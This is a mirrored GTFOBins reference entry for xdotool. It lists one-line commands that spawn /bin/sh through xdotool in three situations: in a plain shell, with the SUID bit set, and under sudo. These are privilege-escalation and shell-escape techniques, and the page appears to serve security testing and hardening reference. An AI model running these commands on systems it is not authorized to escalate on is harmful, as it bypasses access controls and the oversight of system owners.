mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 07:49:17 +01:00
11 lines
221 B
Markdown
11 lines
221 B
Markdown
---
|
|
description: This requires a running X server.
|
|
functions:
|
|
shell:
|
|
- code: xdotool exec --sync /bin/sh
|
|
suid:
|
|
- code: ./xdotool exec --sync /bin/sh -p
|
|
sudo:
|
|
- code: sudo xdotool exec --sync /bin/sh
|
|
---
|